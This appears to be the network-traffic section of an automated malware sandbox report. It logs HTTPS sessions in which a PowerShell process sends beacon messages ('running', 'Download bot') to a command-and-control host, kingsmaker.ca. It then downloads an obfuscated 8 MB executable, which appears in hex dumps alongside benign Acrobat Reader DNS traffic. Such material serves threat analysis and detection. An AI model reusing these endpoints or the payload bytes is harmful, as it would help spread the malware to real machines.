                                                                                                            Data Ascii: KVLFSIcIW`L14TVmiS[1yWSoOhS{j{WUOR`FOtTjq``{m0TV0FLFSIWomiW0[7RTLySVHxOUCWL0K3X1WrcWHxNYChcVSPXluJ`FSHTlykcVyrX2q{UjOrWoWkcW[tXWiNLGqXRYSWLj4wVmeRLVKIWluVS1[7XYmCeG[ISoqiLEWnXmeW[1mtbGS`VDnxXWeNcGjxSoKhLlr{RVmCeGDxNYW`cVy4XmSw`0quSoOkLmT2SGGvT0qY[ICkL0KrX
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 38 54 55 59 71 4e 60 6a 4b 6e 55 59 6d 4b 4f 31 53 53 63 33 65 4b 50 31 47 6f 58 57 65 5b 63 31 71 49 5b 49 4f 68 4c 6a 71 6e 58 6a 53 76 53 6d 5b 73 63 44 38 59 63 47 4b 49 57 55 40 30 56 44 79 75 64 46 79 68 63 56 50 76 58 54 4f 43 65 47 6e 7b 54 56 65 4f 50 33 75 4e 50 33 6d 43 5b 31 6d 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 30 4b 74 58 6a 62 34 60 57 6d 59 65 7b 5b 52 57 6d 71 4a 57 46 79 76 57 57 4b 72 55 6a 38 56 64 54 47 78 54 47 4f 43 60 54 79 55 4c 49 53 4c 54 7b 43 31 55 47 4c 76 65 44 79 55 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 52 47 4b 34 5b 57 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 56 65 4b 50 31 47 73 56 56 31 34 60
                                                                                                            Data Ascii: 8TUYqN`jKnUYmKO1SSc3eKP1GoXWe[c1qI[IOhLjqnXjSvSm[scD8YcGKIWU@0VDyudFyhcVPvXTOCeGn{TVeOP3uNP3mC[1mEPkeDTV8oRTOC[1mEPVeKP0KtXjb4`WmYe{[RWmqJWFyvWWKrUj8VdTGxTGOC`TyULISLT{C1UGLveDyURUeDTV8oRTOC[1mEPVeKRGK4[WDvR1mEPVeKP1GoRTOBO1SSc3eKP1GoRTOC[1mEPVeKP1GsVV14`
                                                                                                            2024-11-29 08:09:11 UTC1369INData Raw: 6f 52 54 4f 43 55 6a 4f 74 4c 44 34 45 63 57 6e 79 58 6c 30 4e 4c 46 47 59 4e 59 57 4b 53 54 34 34 56 6d 65 46 4c 47 71 55 4c 54 5b 68 56 44 48 76 5b 57 5b 52 63 46 4b 58 50 6d 57 60 56 46 66 76 54 6c 30 72 62 30 71 55 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 6f 52 31 44 76 52 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 42 58 6c 4c 7b 54 6f 6d 69 57 7b 57 74 56 47 4f 52 53 33 47 59 64 46 79 54 63 54 5b 31 56 6d 4f 43 4e 54 6d 45 52 6c 79 68 56 44 48 76 5b 57 4c 30 4c 46 57 48 54 56 6d 4b 50 31 47 70 52 54 57 52 63 47 71 75 53 6b 47 68 52 47 47 6f 56 6c 30 72 62 30 71 55 50 6f 57 5b 57 7b 47 72 52 54 65 72 63 54 6d 49 4f 59 5b 6a 50 31 4b 37 58 31 65 56 60 6c 47 59 56 6f 43 60 57 30 47 4e 50 33 6d 43 5b 31 6d 45 50 59 43 44 54 56
                                                                                                            Data Ascii: oRTOCUjOtLD4EcWnyXl0NLFGYNYWKST44VmeFLGqULT[hVDHv[W[RcFKXPmW`VFfvTl0rb0qUPkeDTV8oRTOC[3OISom[W{CoR1DvR1mEPVeKP1GoRTOBXlL{TomiW{WtVGORS3GYdFyTcT[1VmOCNTmERlyhVDHv[WL0LFWHTVmKP1GpRTWRcGquSkGhRGGoVl0rb0qUPoW[W{GrRTercTmIOY[jP1K7X1eV`lGYVoC`W0GNP3mC[1mEPYCDTV


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            10192.168.11.3049745172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:12 UTC284OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 140
                                                                                                            2024-11-29 08:09:12 UTC140OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 72 75 6e 6e 69 6e 67 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 45 6d 70 74 79 20 66 69 6c 65 20 63 72 65 61 74 65 64 20 61 74 3a 20 43 3a 5c 5c 5c 5c 55 73 65 72 73 5c 5c 5c 5c 44 79 6c 61 6e 65 5c 5c 5c 5c 41 70 70 44 61 74 61 5c 5c 5c 5c 4c 6f 63 61 6c 5c 5c 5c 5c 54 65 6d 70 5c 5c 5c 5c 65 6d 70 74 79 2e 74 78 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"running\"", "\"Empty file created at: C:\\\\Users\\\\user\\\\AppData\\\\Local\\\\Temp\\\\empty.txt\"", "----------"]
                                                                                                            2024-11-29 08:09:13 UTC993INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:13 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnkieH1oL36z0DSQOja3%2BT7H73Pl2OGchImhCe3Y3RdPK%2B5ePsb6a8aduTc5LDcuG7zfA4ARdi2HjHgIovv%2B8fpriexn7%2FU6QRLio2nmWFYhUZQTUUDX1mn3BIl1Ud2WsD7CMxfmHGDY"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=17533&min_rtt=1293&rtt_var=24273&sent=33&recv=29&lost=0&retrans=0&sent_bytes=26852&recv_bytes=6402&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d3f0d1709fb-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158949&min_rtt=158930&rtt_var=33558&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1084&delivery_rate=24089&cwnd=252&unsent_bytes=0&cid=b0a08e9c8835b16a&ts=694&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            11192.168.11.3049749172.64.41.34438724C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 128
                                                                                                            Accept: application/dns-message
                                                                                                            Accept-Language: *
                                                                                                            User-Agent: Chrome
                                                                                                            Accept-Encoding: identity
                                                                                                            Content-Type: application/dns-message
                                                                                                            2024-11-29 08:09:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                            2024-11-29 08:09:17 UTC247INHTTP/1.1 200 OK
                                                                                                            Server: cloudflare
                                                                                                            Date: Fri, 29 Nov 2024 08:09:17 GMT
                                                                                                            Content-Type: application/dns-message
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Content-Length: 468
                                                                                                            CF-RAY: 8ea11d59cfed0acf-LAS
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-11-29 08:09:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 65 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom(e^)


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            12192.168.11.3049750172.64.41.34438724C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:16 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 128
                                                                                                            Accept: application/dns-message
                                                                                                            Accept-Language: *
                                                                                                            User-Agent: Chrome
                                                                                                            Accept-Encoding: identity
                                                                                                            Content-Type: application/dns-message
                                                                                                            2024-11-29 08:09:16 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                            2024-11-29 08:09:17 UTC247INHTTP/1.1 200 OK
                                                                                                            Server: cloudflare
                                                                                                            Date: Fri, 29 Nov 2024 08:09:17 GMT
                                                                                                            Content-Type: application/dns-message
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Content-Length: 468
                                                                                                            CF-RAY: 8ea11d59cfe00acf-LAS
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-11-29 08:09:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 65 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom(e^)


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            13192.168.11.3049751172.64.41.34438724C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 128
                                                                                                            Accept: application/dns-message
                                                                                                            Accept-Language: *
                                                                                                            User-Agent: Chrome
                                                                                                            Accept-Encoding: identity
                                                                                                            Content-Type: application/dns-message
                                                                                                            2024-11-29 08:09:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                            2024-11-29 08:09:17 UTC247INHTTP/1.1 200 OK
                                                                                                            Server: cloudflare
                                                                                                            Date: Fri, 29 Nov 2024 08:09:17 GMT
                                                                                                            Content-Type: application/dns-message
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Content-Length: 468
                                                                                                            CF-RAY: 8ea11d5dddd90acd-LAS
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-11-29 08:09:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2b 00 04 8e fa 65 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom+e^)


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            14192.168.11.3049752172.64.41.34438724C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:17 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                            Host: chrome.cloudflare-dns.com
                                                                                                            Connection: keep-alive
                                                                                                            Content-Length: 128
                                                                                                            Accept: application/dns-message
                                                                                                            Accept-Language: *
                                                                                                            User-Agent: Chrome
                                                                                                            Accept-Encoding: identity
                                                                                                            Content-Type: application/dns-message
                                                                                                            2024-11-29 08:09:17 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom)TP
                                                                                                            2024-11-29 08:09:17 UTC247INHTTP/1.1 200 OK
                                                                                                            Server: cloudflare
                                                                                                            Date: Fri, 29 Nov 2024 08:09:17 GMT
                                                                                                            Content-Type: application/dns-message
                                                                                                            Connection: close
                                                                                                            Access-Control-Allow-Origin: *
                                                                                                            Content-Length: 468
                                                                                                            CF-RAY: 8ea11d5e0d7f0acf-LAS
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            2024-11-29 08:09:17 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fa 65 5e 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                            Data Ascii: wwwgstaticcom(e^)


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            15192.168.11.304975323.204.249.814438724C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:23 UTC470OUTGET /onboarding/smskillreader.txt HTTP/1.1
                                                                                                            Host: armmf.adobe.com
                                                                                                            Connection: keep-alive
                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.3.20269 Chrome/105.0.0.0 Safari/537.36
                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                            Sec-Fetch-Dest: empty
                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                            If-None-Match: "78-5faa31cce96da"
                                                                                                            If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
                                                                                                            2024-11-29 08:09:23 UTC198INHTTP/1.1 304 Not Modified
                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                            Last-Modified: Mon, 01 May 2023 15:02:33 GMT
                                                                                                            ETag: "78-5faa31cce96da"
                                                                                                            Date: Fri, 29 Nov 2024 08:09:23 GMT
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.11.3049754172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:25 UTC283OUTPOST /4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3 HTTP/1.1
                                                                                                            Content-Type: application/json
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            Content-Length: 69
                                                                                                            2024-11-29 08:09:25 UTC69OUTData Raw: 5b 0d 0a 20 20 20 20 22 5c 22 53 6c 65 65 70 20 31 30 73 5c 22 22 2c 0d 0a 20 20 20 20 22 5c 22 44 6f 77 6e 6c 6f 61 64 20 62 6f 74 5c 22 22 2c 0d 0a 20 20 20 20 22 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 22 0d 0a 5d
                                                                                                            Data Ascii: [ "\"Sleep 10s\"", "\"Download bot\"", "----------"]
                                                                                                            2024-11-29 08:09:25 UTC1000INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:25 GMT
                                                                                                            Content-Length: 0
                                                                                                            Connection: close
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VaRf2Ls4GvbjEXrFPs%2BvfIwZqZk%2BAGd1EGlpzw%2FZkbzYOUW7sYU%2F4qNzGTBSJbiWZAgAJoJGcXG4FkPdIN4Ire385khg%2BToQt37piIzzZufLhPdoiTRWoftagC5wDn3t%2FKlk%2Bm7MoGdT"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=30960&min_rtt=1257&rtt_var=26928&sent=62&recv=62&lost=0&retrans=0&sent_bytes=34322&recv_bytes=25184&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d8d1eb60ad5-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158710&min_rtt=158654&rtt_var=33542&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=1012&delivery_rate=24118&cwnd=252&unsent_bytes=0&cid=8416ce3edf77b3c4&ts=661&x=0"


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.11.3049755172.67.179.674435936C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-29 08:09:26 UTC332OUTGET /file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76 HTTP/1.1
                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151
                                                                                                            Host: kingsmaker.ca
                                                                                                            2024-11-29 08:09:26 UTC1114INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 29 Nov 2024 08:09:26 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 8351232
                                                                                                            Connection: close
                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hg%2Bh3R7Ql6zO5rwUG926DR%2FHFiaAImnRcEgnG3crKK%2F9D9VDeY5W2w42lE6tmbXl9PZDj%2Bg11cHhfxhu121sAjFhHuGOv3llVLNqSuFLx9pCUgvcVekxc0PozgTjuCYexHQRal%2FGWXR1"}],"group":"cf-nel","max_age":604800}
                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=33594&min_rtt=1257&rtt_var=25464&sent=64&recv=64&lost=0&retrans=0&sent_bytes=35100&recv_bytes=26120&delivery_rate=12835164&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                            X-Powered-By: ARR/3.0
                                                                                                            Server: cloudflare
                                                                                                            CF-RAY: 8ea11d93ee030ad9-LAS
                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=158805&min_rtt=158774&rtt_var=33543&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=970&delivery_rate=24109&cwnd=252&unsent_bytes=0&cid=6b392fa9f940e25d&ts=706&x=0"
                                                                                                            2024-11-29 08:09:26 UTC255INData Raw: 4c 5b 91 01 02 01 01 01 05 01 01 01 fe fe 01 01 b9 01 01 01 01 01 01 01 41 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 e9 01 01 01 0f 1e bb 0f 01 b5 08 cc 20 b9 00 4d cc 20 55 69 68 72 21 71 73 6e 66 73 60 6c 21 62 60 6f 6f 6e 75 21 63 64 21 73 74 6f 21 68 6f 21 45 4e 52 21 6c 6e 65 64 2f 0c 0c 0b 25 01 01 01 01 01 01 01 ac bf 76 f8 e8 de 18 ab e8 de 18 ab e8 de 18 ab e1 a6 8b ab e6 de 18 ab 98 5f 19 aa fb de 18 ab e8 de 19 ab 98 df 18 ab f8 5a 1b aa fa de 18 ab f8 5a 1c aa d1 de 18 ab e8 de 18 ab e9 de 18 ab f8 5a 1d aa 9e de 18 ab a0 5b 18 aa e9 de 18 ab a0 5b 1a aa e9 de 18 ab 53 68 62 69 e8 de 18 ab 01 01 01 01 01 01 01 01 51 44 01 01 65 87 09 01 02 d3 0c 66 01 01 01 01 01 01 01 01 f1 01 23
                                                                                                            Data Ascii: L[A M Uihr!qsnfs`l!b`oonu!cd!sto!ho!ENR!lned/%v_ZZZ[[ShbiQDef#
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: 01 0a 03 0f 28 01 d5 46 01 01 47 38 01 01 15 16 01 e1 b7 0a 01 01 11 01 01 01 01 01 41 00 01 01 01 01 11 01 01 01 03 01 01 07 01 01 01 01 01 01 01 07 01 01 01 01 01 01 01 01 71 99 01 01 05 01 01 01 01 01 01 02 01 61 80 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 11 01 01 01 01 01 01 11 01 01 01 01 01 01 01 01 01 01 11 01 01 01 11 29 90 01 59 01 01 01 69 29 90 01 55 00 01 01 01 41 99 01 8b 04 01 01 01 71 92 01 45 ce 05 01 01 01 01 01 01 01 01 01 01 51 99 01 cd 11 01 01 31 8f 87 01 1d 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 91 87 01 29 01 01 01 f1 8d 87 01 41 00 01 01 01 01 01 01 01 01 01 01 01 11 5e 01 01 0a 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 2f 75 64 79 75 01 01 01 79 26 0d 01 01 11
                                                                                                            Data Ascii: (FG8Aqa)Yi)UAqEQ1)A^/udyuy&
                                                                                                            2024-11-29 08:09:26 UTC1369INData Raw: c2 49 8a d1 e8 be d5 25 01 49 8c 04 99 d7 4f 01 49 8c 0c 88 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 a3 d5 25 01 49 8c 04 d2 d7 4f 01 49 8c 0c c5 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 84 d5 25 01 49 8c 04 07 d6 4f 01 49 8c 0c f6 d7 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 69 d5 25 01 49 8c 04 20 d6 4f 01 49 8c 0c 13 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 4a d5 25 01 49 8c 04 1d d6 4f 01 49 8c 0c 0c d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 2f d5 25 01 49 8c 04 26 d6 4f 01 49 8c 0c 19 d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 10 d5 25 01 49 8c 04 8b d6 4f 01 49 8c 0c 7a d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 f5 d2 25 01 49 8c 04 9c d6 4f 01 49 8c 0c 8f d6 4f 01 49 82 38 01 74 00 c2 49 8a d1 e8 d6 d2 25 01 49 8c 04 a9 d6 4f 01 49 8c 0c 98 d6 4f 01
                                                                                                            Data Ascii: I%IOIOI8tI%IOIOI8tI%IOIOI8tIi%I OIOI8tIJ%IOIOI8tI/%I&OIOI8tI%IOIzOI8tI%IOIOI8tI%IOIO
